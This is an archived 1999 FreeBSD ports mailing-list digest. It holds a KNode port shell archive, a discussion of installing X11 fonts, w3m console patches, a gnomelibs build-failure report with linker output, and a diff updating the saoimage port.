X# New ports collection makefile for: knode X# Version required: 0.1.10 X# Date created: 18-Dec-1999 X# Whom: Klaus Herrmann X# X# $FreeBSD$ X# X XDISTNAME= knode-0.1.10 XCATEGORIES= news kde XMASTER_SITES= http://software.freepage.de/cthurner/ X XMAINTAINER= klaus.herrmann@gmx.net X XLIB_DEPENDS= kdecore.2:${PORTSDIR}/x11/kdelibs11 \ X kdeui.2:${PORTSDIR}/x11/kdelibs11 \ X khtmlw.2:${PORTSDIR}/x11/kdelibs11 X XKDEDIR= ${PREFIX} XUSE_QT= yes XUSE_AUTOCONF= yes XUSE_GMAKE= yes XGNU_CONFIGURE= yes X Xpost-install: X.if !defined(NOPORTDOCS) X ${MKDIR} ${PREFIX}/share/doc/HTML/en/knode X ${INSTALL_MAN} ${WRKSRC}/knode/docs/en/index-1.html \ X ${PREFIX}/share/doc/HTML/en/knode/index-1.html X ${INSTALL_MAN} ${WRKSRC}/knode/docs/en/index-2.html \ X ${PREFIX}/share/doc/HTML/en/knode/index-2.html X ${INSTALL_MAN} ${WRKSRC}/knode/docs/en/index-3.html \ X ${PREFIX}/share/doc/HTML/en/knode/index-3.html X ${INSTALL_MAN} ${WRKSRC}/knode/docs/en/index.html \ X ${PREFIX}/share/doc/HTML/en/knode/index.html X ${INSTALL_MAN} ${WRKSRC}/knode/docs/en/logotp3.gif \ X ${PREFIX}/share/doc/HTML/en/knode/logotp3.gif X.endif X X.include END-of-knode/Makefile echo c - knode/files mkdir -p knode/files > /dev/null 2>&1 echo x - knode/files/md5 sed 's/^X//' >knode/files/md5 << 'END-of-knode/files/md5' XMD5 (knode-0.1.10.tar.gz) = 86cd71d8ff1ca79e4e86512fc2168776 END-of-knode/files/md5 echo c - knode/pkg mkdir -p knode/pkg > /dev/null 2>&1 echo x - knode/pkg/PLIST sed 's/^X//' >knode/pkg/PLIST << 'END-of-knode/pkg/PLIST' Xbin/knode Xshare/doc/HTML/en/knode/index-1.html Xshare/doc/HTML/en/knode/index-2.html Xshare/doc/HTML/en/knode/index-3.html Xshare/doc/HTML/en/knode/index.html Xshare/doc/HTML/en/knode/logotp3.gif Xshare/apps/knode/toolbar/connect.xpm Xshare/apps/knode/toolbar/delete.xpm Xshare/apps/knode/toolbar/disconnect.xpm Xshare/apps/knode/toolbar/grpdlg.xpm Xshare/apps/knode/toolbar/newmsg.xpm Xshare/apps/knode/toolbar/remail.xpm Xshare/apps/knode/toolbar/reply.xpm Xshare/apps/knode/toolbar/save.xpm Xshare/apps/knode/toolbar/send.xpm Xshare/apps/knode/toolbar/settings.xpm Xshare/apps/knode/toolbar/filter.xpm Xshare/apps/knode/toolbar/refresh.xpm Xshare/apps/knode/toolbar/dlall.xpm Xshare/apps/knode/toolbar/nextart.xpm Xshare/apps/knode/toolbar/nextthr.xpm Xshare/apps/knode/toolbar/signature.xpm Xshare/apps/knode/pics/arrow_left.xpm Xshare/apps/knode/pics/arrow_right.xpm Xshare/apps/knode/pics/folder.xpm Xshare/apps/knode/pics/greyball.xpm Xshare/apps/knode/pics/mail.xpm Xshare/apps/knode/pics/pen.xpm Xshare/apps/knode/pics/posting.xpm Xshare/apps/knode/pics/redball.xpm Xshare/apps/knode/pics/snderr.xpm Xshare/apps/knode/pics/group.xpm Xshare/apps/knode/pics/eyes.xpm Xshare/apps/knode/pics/fltrblue.xpm Xshare/apps/knode/pics/fltrgrey.xpm Xshare/apps/knode/pics/newsubs.xpm Xshare/apps/knode/filters/1.fltr Xshare/apps/knode/filters/2.fltr Xshare/apps/knode/filters/3.fltr Xshare/apps/knode/filters/4.fltr Xshare/apps/knode/filters/5.fltr Xshare/applnk/Internet/knode.kdelnk Xshare/icons/knode.xpm Xshare/icons/mini/knode.xpm X@dirrm share/doc/HTML/en/knode/ X@dirrm share/apps/knode/toolbar/ X@dirrm share/apps/knode/pics/ X@dirrm share/apps/knode/filters/ X@dirrm share/apps/knode END-of-knode/pkg/PLIST echo x - knode/pkg/DESCR sed 's/^X//' >knode/pkg/DESCR << 'END-of-knode/pkg/DESCR' XKNode is a newsreader for the K Desktop Enviroment. XIt is a pure online-reader, that is supposed to be used with a Xlocal newsserver. I have only tested it with leafnode, but it Xshould work with every server, that supports the xover-command. END-of-knode/pkg/DESCR echo x - knode/pkg/COMMENT sed 's/^X//' >knode/pkg/COMMENT << 'END-of-knode/pkg/COMMENT' XKNode is a newsreader for the K Desktop Enviroment. END-of-knode/pkg/COMMENT exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 15:30:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from news-ma.rhein-neckar.de (news-ma.rhein-neckar.de [193.197.90.3]) by hub.freebsd.org (Postfix) with ESMTP id 150E91504A for ; Sat, 18 Dec 1999 15:30:41 -0800 (PST) (envelope-from naddy@bigeye.rhein-neckar.de) Received: from bigeye.rhein-neckar.de (uucp@localhost) by news-ma.rhein-neckar.de (8.8.8/8.8.8) with bsmtp id AAA15940 for ports@freebsd.org; Sun, 19 Dec 1999 00:30:38 +0100 (CET) (envelope-from naddy@bigeye.rhein-neckar.de) Received: (from naddy@localhost) by bigeye.rhein-neckar.de (8.9.3/8.9.3) id AAA49819 for ports@freebsd.org; Sun, 19 Dec 1999 00:27:49 +0100 (CET) (envelope-from naddy) Date: Sun, 19 Dec 1999 00:27:48 +0100 From: Christian Weisgerber To: ports@freebsd.org Subject: Installing additional X11 fonts? Message-ID: <19991219002748.H1026@bigeye.rhein-neckar.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think we need an example port to show how to properly add new X11 fonts, and how to deal with various issues in that process: 1. Where to install the fonts? This shouldn't really be an issue at all. I distinctly remember that additional X11 fonts should go into ${X11BASE}/lib/X11/fonts/local. However, of the handful of examples in the x11-fonts category, only one installs there. The others create their own directories under ${X11BASE}/lib/X11/fonts. Should these ports be fixed? 2. How to merge fonts.alias? This problem points to larger one: the package framework doesn't really support merging files. Data to be merged needs to be put into the INSTALL script, and inserted in some way with cat/sed/perl. If the data is from the distribution tarball, the INSTALL script needs to be generated at build time. In order to remove the added data properly at deinstallation, some markers need to be put into the file. This is rather cumbersome and lacks standardized solutions in the ports tree. 3. How to update the X server's font path? Sure, I can run "xset fp rehash" post installation. That may even work. I can appear to work, but actually talk to the wrong X server. Or it can fail completely, if the root shell I'm installing from doesn't have the proper DISPLAY and ~/.Xauthority, assuming I'm under X11 in the first place. Better to not run any command and only echo a reminder to do this manually? -- Christian "naddy" Weisgerber naddy@mips.rhein-neckar.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 17:46:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.cs.tu-berlin.de (mail.cs.tu-berlin.de [130.149.17.13]) by hub.freebsd.org (Postfix) with ESMTP id 372E614D79 for ; Sat, 18 Dec 1999 17:46:16 -0800 (PST) (envelope-from eserte@cs.tu-berlin.de) Received: (from eserte@localhost) by mail.cs.tu-berlin.de (8.9.3/8.9.1) id CAA21371; Sun, 19 Dec 1999 02:36:09 +0100 (MET) Received: (from eserte@localhost) by cabulja.herceg.de (8.9.3/8.6.12) id CAA03314; Sun, 19 Dec 1999 02:27:46 +0100 (CET) To: Christian Weisgerber Cc: freebsd-ports@freebsd.org Subject: Re: Installing additional X11 fonts? References: <19991219002748.H1026@bigeye.rhein-neckar.de> Reply-To: eserte@cs.tu-berlin.de From: Slaven Rezic Date: 19 Dec 1999 02:27:46 +0100 In-Reply-To: Christian Weisgerber's message of Sun, 19 Dec 1999 00:27:48 +0100 Message-ID: <877libra7h.fsf@cabulja.herceg.de> Lines: 33 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christian Weisgerber writes: > > I think we need an example port to show how to properly add new > X11 fonts, and how to deal with various issues in that process: > [...] > > 2. How to merge fonts.alias? > This problem points to larger one: the package framework doesn't > really support merging files. Data to be merged needs to be put > into the INSTALL script, and inserted in some way with cat/sed/perl. > If the data is from the distribution tarball, the INSTALL script > needs to be generated at build time. In order to remove the > added data properly at deinstallation, some markers need to be > put into the file. This is rather cumbersome and lacks standardized > solutions in the ports tree. What about installing a file fonts.alias.thisport for each port and recombine them to fonts.alias after each font related package install/delete? Of course all font related packages have to be changed to use this policy. Gruss, Slaven -- use Tk;$c=tkinit->Canvas(-he,20)->grid;$x=5;map{s!\n!!g;map{create$c 'line'=> map{$a=-43+ord;($x+($a>>3)*2=>5+($a&7)*2)}split''}split"!";$x+=12}split/_/=>'K PI1_+09IPK_K;-OA1_+K!;A__1;Q!7G_1+QK_3CLPI90,_+K!;A_+1!KQ!.N_K+1Q!.F_1+KN.Q__1+ KN._K+1Q!.F_1+KN.Q_+1Q__+1!KQ!.N_1;Q!7G_K3,09Q_+1!K.Q_K+1Q!.F_1+KN.Q_';MainLoop To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 18 20:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6913C151A1 for ; Sat, 18 Dec 1999 20:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62904; Sat, 18 Dec 1999 20:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from narcissus.pel.sys.hiroshima-u.ac.jp (narcissus.pel.sys.hiroshima-u.ac.jp [133.41.37.161]) by hub.freebsd.org (Postfix) with ESMTP id 6BD4D14BF1 for ; Sat, 18 Dec 1999 20:10:51 -0800 (PST) (envelope-from nobutaka@narcissus.pel.sys.hiroshima-u.ac.jp) Received: (from nobutaka@localhost) by narcissus.pel.sys.hiroshima-u.ac.jp (8.9.3/8.9.3) id BAA05626; Sun, 19 Dec 1999 01:36:33 +0900 (JST) (envelope-from nobutaka) Message-Id: <199912181636.BAA05626@narcissus.pel.sys.hiroshima-u.ac.jp> Date: Sun, 19 Dec 1999 01:36:33 +0900 (JST) From: nobutaka@nobutaka.com Reply-To: nobutaka@nobutaka.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15556: Additional patches for www/w3m Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15556 >Category: ports >Synopsis: Additional patches for www/w3m >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 20:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: MANTANI Nobutaka >Release: FreeBSD 4.0-CURRENT i386 >Organization: Hiroshima University >Environment: >Description: Here are additional patches (patch-al, patch-am) for www/w3m port. w3m doesn't check whether it is running on xterm or not. Therefore w3m puts xterm escape sequences when it is running on console. patch-al fixes this problem. And patch-am adds support for Home/End/PgUp/PgDn keys on console. >How-To-Repeat: >Fix: diff -urN w3m.old/patches/patch-al w3m/patches/patch-al --- w3m.old/patches/patch-al Thu Jan 1 09:00:00 1970 +++ w3m/patches/patch-al Sat Dec 18 16:55:26 1999 @@ -0,0 +1,55 @@ +--- terms.c.orig Sat Dec 18 16:46:16 1999 ++++ terms.c Sat Dec 18 16:53:51 1999 +@@ -14,8 +14,8 @@ + #include + #ifdef USE_GPM + #include +-static int is_xterm = 0; + #endif ++static int is_xterm = 0; + + #ifdef AIX + #include +@@ -1471,16 +1471,23 @@ + gpm_handler = gpm_process_mouse; + } + #endif ++ char *term; ++ ++ if (mouseActive) return; ++ term = getenv("TERM"); ++ if (!strncmp(term,"kterm",5) || !strncmp(term,"xterm",5)) { ++ is_xterm = 1; ++ } + mouseActive = 1; + } + + void mouse_end() + { + if (mouseActive == 0) return; +-#ifdef USE_GPM + if (is_xterm) { + XTERM_OFF; + } ++#ifdef USE_GPM + else + Gpm_Close(); + #endif +@@ -1491,17 +1498,13 @@ + { + if (!mouseActive) + mouse_init(); +-#ifdef USE_GPM + if (is_xterm) +-#endif + XTERM_ON; + } + + void mouse_inactive() + { +-#ifdef USE_GPM + if (is_xterm) +-#endif + XTERM_OFF; + } + diff -urN w3m.old/patches/patch-am w3m/patches/patch-am --- w3m.old/patches/patch-am Thu Jan 1 09:00:00 1970 +++ w3m/patches/patch-am Sun Dec 19 00:40:32 1999 @@ -0,0 +1,14 @@ +--- keybind.c.orig Mon Dec 6 15:18:33 1999 ++++ keybind.c Mon Dec 6 15:24:31 1999 +@@ -90,9 +90,9 @@ + /* 8 9 : ; < = > ? */ + nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, + /* @ A B C D E F G */ +- nulcmd, movU, movD, movR, movL, nulcmd, nulcmd, nulcmd, ++ nulcmd, movU, movD, movR, movL, nulcmd, goLineL,pgFore, + /* H I J K L M N O */ +- nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, mouse, nulcmd, nulcmd, ++ goLineF,pgBack, nulcmd, nulcmd, nulcmd, mouse, nulcmd, nulcmd, + /* P Q R S T U V W */ + nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, nulcmd, + /* X Y Z [ \ ] ^ _ */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 1:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A5DF15219 for ; Sun, 19 Dec 1999 01:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA80454; Sun, 19 Dec 1999 01:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from lcb13.cvzoom.net (lcb13.cvzoom.net [63.65.159.13]) by hub.freebsd.org (Postfix) with ESMTP id 96F4D15145 for ; Sun, 19 Dec 1999 01:03:50 -0800 (PST) (envelope-from dmmiller@lcb13.cvzoom.net) Received: (from dmmiller@localhost) by lcb13.cvzoom.net (8.9.3/8.9.3) id EAA62074; Sun, 19 Dec 1999 04:02:41 -0500 (EST) (envelope-from dmmiller) Message-Id: <199912190902.EAA62074@lcb13.cvzoom.net> Date: Sun, 19 Dec 1999 04:02:41 -0500 (EST) From: Donn Miller Reply-To: dmmiller@cvzoom.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15558: Gnomelibs won't compile on -current Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15558 >Category: ports >Synopsis: /usr/ports/x11/gnomelibs fails to compile >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 01:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Donn Miller >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD lcb13.cvzoom.net 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Sat Dec 18 22:53:37 EST 1999 dmmiller@lcb13.cvzoom.net:/usr/src/sys/compile/CUSTOM i386 >Description: When I try to build the gnomelibs port on -current, I get the following errors. Maybe it's an issue with gcc 2.95? /bin/sh ../libtool --mode=link cc -mpentium -O3 -pipe -Wall -Wunused -o gnome_segv gnome_segv.o libgnomeui.la ../libgnome/libgnome.la ../libart_lgpl/libart_lgpl.la ../support/libgnomesupport.la -L/usr/local/lib -lesd -laudiofile -lm -L/usr/local/lib -laudiofile -lm -L/usr/local/lib -lglib12 -L/usr/X11R6/lib -lgdk_imlib -L/usr/X11R6/lib -L/usr/X11R6/lib -lgtk12 -lgdk12 -L/usr/local/lib -Wl,-E -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -L/usr/local/lib -lSM -lICE -L/usr/X11R6/lib -L/usr/X11R6/lib -lgtk12 -lgdk12 -L/usr/local/lib -Wl,-E -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -lintl -lz -lm -L/usr/local/lib cc -mpentium -O3 -pipe -Wall -Wunused -o .libs/gnome_segv gnome_segv.o .libs/libgnomeui.so -L/usr/local/lib -lesd -laudiofile -lm -laudiofile -lm -lglib12 -L/usr/X11R6/lib -lgdk_imlib -lgtk12 -lgdk12 -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -lSM -lICE -lgtk12 -lgdk12 -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -lz -lm ../libgnome/.libs/libgnome.so -lglib12 -lm -lz -lm ../libart_lgpl/.libs/libart_lgpl.so -lz -lm ../support/.libs/libgnomesupport.so -lz -lm -L/usr/local/lib -lesd -laudiofile -lm -L/usr/local/lib -laudiofile -lm -L/usr/local/lib -lglib12 -L/usr/X11R6/lib -lgdk_imlib -L/usr/X11R6/lib -L/usr/X11R6/lib -lgtk12 -lgdk12 -L/usr/local/lib -Wl,-E -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -L/usr/local/lib -lSM -lICE -L/usr/X11R6/lib -L/usr/X11R6/lib -lgtk12 -lgdk12 -L/usr/local/lib -Wl,-E -lgmodule12 -lglib12 -lintl -lxpg4 -lXext -lX11 -lm -lintl -lz -lm -L/usr/local/lib -Wl,--rpath -Wl,/usr/X11R6/lib .libs/libgnomeui.so: undefined reference to `png_set_sBIT' .libs/libgnomeui.so: undefined reference to `DGifGetExtensionNext' .libs/libgnomeui.so: undefined reference to `jpeg_read_scanlines' .libs/libgnomeui.so: undefined reference to `DGifGetRecordType' .libs/libgnomeui.so: undefined reference to `DGifGetImageDesc' .libs/libgnomeui.so: undefined reference to `TIFFDefaultStripSize' .libs/libgnomeui.so: undefined reference to `png_set_strip_16' .libs/libgnomeui.so: undefined reference to `png_set_filler' .libs/libgnomeui.so: undefined reference to `png_create_read_struct' .libs/libgnomeui.so: undefined reference to `jpeg_set_defaults' .libs/libgnomeui.so: undefined reference to `DGifOpenFileHandle' .libs/libgnomeui.so: undefined reference to `TIFFReadRGBAImage' .libs/libgnomeui.so: undefined reference to `png_set_read_fn' .libs/libgnomeui.so: undefined reference to `png_set_packing' .libs/libgnomeui.so: undefined reference to `png_get_io_ptr' .libs/libgnomeui.so: undefined reference to `_TIFFmalloc' .libs/libgnomeui.so: undefined reference to `jpeg_start_decompress' .libs/libgnomeui.so: undefined reference to `png_set_IHDR' .libs/libgnomeui.so: undefined reference to `DGifGetLine' .libs/libgnomeui.so: undefined reference to `TIFFWriteScanline' .libs/libgnomeui.so: undefined reference to `png_write_rows' .libs/libgnomeui.so: undefined reference to `DGifCloseFile' .libs/libgnomeui.so: undefined reference to `_TIFFfree' .libs/libgnomeui.so: undefined reference to `png_get_valid' .libs/libgnomeui.so: undefined reference to `jpeg_destroy_decompress' .libs/libgnomeui.so: undefined reference to `jpeg_std_error' .libs/libgnomeui.so: undefined reference to `jpeg_CreateDecompress' .libs/libgnomeui.so: undefined reference to `TIFFFdOpen' .libs/libgnomeui.so: undefined reference to `png_create_write_struct' .libs/libgnomeui.so: undefined reference to `TIFFSetField' .libs/libgnomeui.so: undefined reference to `TIFFScanlineSize' .libs/libgnomeui.so: undefined reference to `DGifGetExtension' .libs/libgnomeui.so: undefined reference to `png_write_info' .libs/libgnomeui.so: undefined reference to `PrintGifError' .libs/libgnomeui.so: undefined reference to `TIFFClose' .libs/libgnomeui.so: undefined reference to `png_set_expand' .libs/libgnomeui.so: undefined reference to `TIFFOpen' .libs/libgnomeui.so: undefined reference to `jpeg_read_header' .libs/libgnomeui.so: undefined reference to `jpeg_start_compress' .libs/libgnomeui.so: undefined reference to `png_write_end' .libs/libgnomeui.so: undefined reference to `png_get_IHDR' .libs/libgnomeui.so: undefined reference to `jpeg_finish_decompress' .libs/libgnomeui.so: undefined reference to `jpeg_stdio_src' .libs/libgnomeui.so: undefined reference to `jpeg_CreateCompress' .libs/libgnomeui.so: undefined reference to `png_read_info' .libs/libgnomeui.so: undefined reference to `jpeg_finish_compress' .libs/libgnomeui.so: undefined reference to `png_destroy_read_struct' .libs/libgnomeui.so: undefined reference to `png_read_image' .libs/libgnomeui.so: undefined reference to `png_create_info_struct' .libs/libgnomeui.so: undefined reference to `jpeg_set_quality' .libs/libgnomeui.so: undefined reference to `jpeg_stdio_dest' .libs/libgnomeui.so: undefined reference to `jpeg_write_scanlines' .libs/libgnomeui.so: undefined reference to `png_destroy_write_struct' .libs/libgnomeui.so: undefined reference to `png_libpng_ver' .libs/libgnomeui.so: undefined reference to `png_set_shift' .libs/libgnomeui.so: undefined reference to `TIFFGetField' .libs/libgnomeui.so: undefined reference to `png_init_io' gmake[3]: *** [gnome_segv] Error 1 gmake[3]: Leaving directory `/usr/ports/x11/gnomelibs/work/gnome-libs-1.0.54/libgnomeui' gmake[2]: *** [all-recursive] Error 1 gmake[2]: Leaving directory `/usr/ports/x11/gnomelibs/work/gnome-libs-1.0.54/libgnomeui' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/usr/ports/x11/gnomelibs/work/gnome-libs-1.0.54' gmake: *** [all-recursive-am] Error 2 *** Error code 2 Stop in /usr/ports/x11/gnomelibs. *** Error code 1 Stop in /usr/ports/x11/gnomelibs. *** Error code 1 Stop in /usr/ports/x11/gnomelibs. >How-To-Repeat: Just try building the latest cvsup of /usr/ports/x11/gnomelibs. >Fix: Don't know. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 19 7: 0:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 835F614C83 for ; Sun, 19 Dec 1999 07:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA53029; Sun, 19 Dec 1999 07:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cichlids.com (as6-042.rp-plus.de [149.221.238.170]) by hub.freebsd.org (Postfix) with ESMTP id CB41714D03 for ; Sun, 19 Dec 1999 06:54:03 -0800 (PST) (envelope-from alex@cichlids.com) Received: from cichlids.cichlids.com (cichlids.cichlids.com [192.168.0.10]) by cichlids.com (Postfix) with ESMTP id E5360AB7F for ; Sun, 19 Dec 1999 15:55:11 +0100 (CET) Received: (from root@localhost) by cichlids.cichlids.com (8.9.3/8.9.3) id PAA05442; Sun, 19 Dec 1999 15:54:48 +0100 (CET) (envelope-from alex) Message-Id: <199912191454.PAA05442@cichlids.cichlids.com> Date: Sun, 19 Dec 1999 15:54:48 +0100 (CET) From: alex@big.endian.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15559: update astro/saoimage to 1.26 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15559 >Category: ports >Synopsis: update astro/soaimage to 1.26 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander Langer >Release: FreeBSD 4.0-CURRENT i386 >Organization: no >Environment: Tested under: -current from today. >Description: * Update port to new version 1.26.10 * Change Mastersite-directory * remove pre-patch target * remove unneeded patches (patch-ad and -ae) * add a new patch against a compile-error >How-To-Repeat: >Fix: diff -rNu saoimage.old/Makefile saoimage/Makefile --- saoimage.old/Makefile Wed Aug 25 06:22:41 1999 +++ saoimage/Makefile Sun Dec 19 14:49:19 1999 @@ -1,14 +1,14 @@ # New ports collection makefile for: saoimage -# Version required: 1.22 +# Version required: 1.26.10 # Date created: 21 Feb 1998 # Whom: giffunip@asme.org # # $FreeBSD: ports/astro/saoimage/Makefile,v 1.6 1999/08/25 04:22:41 obrien Exp $ # -DISTNAME= saoimage-1.22 +DISTNAME= saoimage-1.26.10 CATEGORIES= astro -MASTER_SITES= ftp://cfa-ftp.harvard.edu/pub/gsc/SAOimage/Old/ +MASTER_SITES= ftp://cfa-ftp.harvard.edu/pub/gsc/SAOimage/ MAINTAINER= giffunip@asme.org @@ -19,8 +19,6 @@ MANL= saoimage.l USE_X_PREFIX= yes -pre-patch: - $(CP) $(WRKSRC)/makefile.sun $(WRKSRC)/makefile.$(ALL_TARGET) pre-build: @(cd ${WRKSRC}/btnlib; ${MAKE}) post-install: diff -rNu saoimage.old/files/md5 saoimage/files/md5 --- saoimage.old/files/md5 Sun Sep 27 01:29:02 1998 +++ saoimage/files/md5 Sun Dec 19 14:51:36 1999 @@ -1 +1 @@ -MD5 (saoimage-1.22.tar.gz) = f1a6725d609f98ddeb51cbb96811ddf0 +MD5 (saoimage-1.26.10.tar.gz) = 48160a31760aef33be756c14b1df2f9d diff -rNu saoimage.old/patches/patch-aa saoimage/patches/patch-aa --- saoimage.old/patches/patch-aa Sun Jan 3 10:24:49 1999 +++ saoimage/patches/patch-aa Sun Dec 19 14:55:55 1999 @@ -1,196 +1,15 @@ -*** makefile.FreeBSD.orig Sun Jan 3 17:42:56 1999 ---- makefile.FreeBSD Sun Jan 3 18:15:02 1999 -*************** -*** 1,5 **** - # -! # makefile.sun for SAOimage # Sun workstations using SunOS 4.* and MIT Xlib - # - # To build: - # % make (or `make all') # build libs/program as necessary ---- 1,5 ---- - # -! # makefile.FreeBSD for SAOimage # x86 workstations using FreeBSD and MIT Xlib - # - # To build: - # % make (or `make all') # build libs/program as necessary -*************** -*** 36,44 **** - # FBCONFIG_2, which is set to the value of IMTOOLRC in the definition of - # the CFLAGS macro below.) - -! SAOBINDIR = $(ROOT)/usr/local/bin/ -! SAOMANDIR = $(ROOT)/usr/man/manl/ -! IMTRCDIR = $(ROOT)/usr/local/lib/ - - IMTOOLRC = $(IMTRCDIR)imtoolrc - FIFO_I = $(ROOT)/dev/imt1i ---- 36,44 ---- - # FBCONFIG_2, which is set to the value of IMTOOLRC in the definition of - # the CFLAGS macro below.) - -! SAOBINDIR = $(ROOT)$(PREFIX)/bin/ -! SAOMANDIR = $(ROOT)$(PREFIX)/man/manl/ -! IMTRCDIR = $(ROOT)$(PREFIX)/lib/ - - IMTOOLRC = $(IMTRCDIR)imtoolrc - FIFO_I = $(ROOT)/dev/imt1i -*************** -*** 46,52 **** - FIFO_LN = $(ROOT)/dev/imt1 - - # Compiler specification. -! CC = cc - # Uncomment these two lines to compile with gcc (add any optimizers you wish). - #CC = gcc -finline-functions -fdelayed-branch -fstrength-reduce - # Delayed branches could win big on RISC: many inner loops have branches ---- 46,52 ---- - FIFO_LN = $(ROOT)/dev/imt1 - - # Compiler specification. -! #CC = cc - # Uncomment these two lines to compile with gcc (add any optimizers you wish). - #CC = gcc -finline-functions -fdelayed-branch -fstrength-reduce - # Delayed branches could win big on RISC: many inner loops have branches -*************** -*** 62,86 **** - # fired up on a system where the fifos are absent. Other than this, the - # standalone operation is unhindered. - -! IFLAGS = -DFITS -DOIF -DIMTOOL - - # MFLAGS: machine or library specific code. - # -DSUN - SunOS temp file name, IEEE floating point debug, and Sun keyboard - # -DLSB - byte swap for FITS (VAX and DECstations) - # -DSYSV - substitutes for getdtablesize() and setrlimit() not widely known - # -DPSCRIPT - hard copy output to a PostScript printer (else no hardcopy) - -! MFLAGS = -DSUN -DPSCRIPT -DQUIT - - # OFLAGS: compiler optimization/debug options. - -! OFLAGS = -g -DDEBUG -! #OFLAGS = -O - - # ADFLAGS: architecture-dependent floating point flags, etc. - - #ADFLAGS = -I/usr/openwin/share/include # ATTENTION: OpenWindows users... -! ADFLAGS = - - # Libraries that move about or may require special specification. - # ---- 62,90 ---- - # fired up on a system where the fifos are absent. Other than this, the - # standalone operation is unhindered. - -! IFLAGS = -DFITS -DOIF #-DIMTOOL - - # MFLAGS: machine or library specific code. - # -DSUN - SunOS temp file name, IEEE floating point debug, and Sun keyboard - # -DLSB - byte swap for FITS (VAX and DECstations) - # -DSYSV - substitutes for getdtablesize() and setrlimit() not widely known - # -DPSCRIPT - hard copy output to a PostScript printer (else no hardcopy) -+ # -DMIRIAD - extras - -! MFLAGS = -DLSB -DSUN -DPSCRIPT -DQUIT -! .if ${MACHINE_ARCH} == "alpha" -! MFLAGS += -DLONG64 -! .endif - - # OFLAGS: compiler optimization/debug options. - -! #OFLAGS = -g -DDEBUG -! #OFLAGS = -O2 -m486 -pipe - - # ADFLAGS: architecture-dependent floating point flags, etc. - - #ADFLAGS = -I/usr/openwin/share/include # ATTENTION: OpenWindows users... -! ADFLAGS = -I$(X11BASE)/include - - # Libraries that move about or may require special specification. - # -*************** -*** 88,110 **** - # usual link search path, i.e., it is not in /usr/lib, it may be necessary - # to specify its path fully in XLIB. - -! XLIB = -lX11 -! #XLIB = -L/usr/openwin/lib -lX11 # ATTENTION: OpenWindows users... - #F77LIB = -lF77 -lI77 -lU77 - #LDFLAGS = -Bstatic - - # END OF INSTALLATION DEPENDENT SETUP. ======================================== - 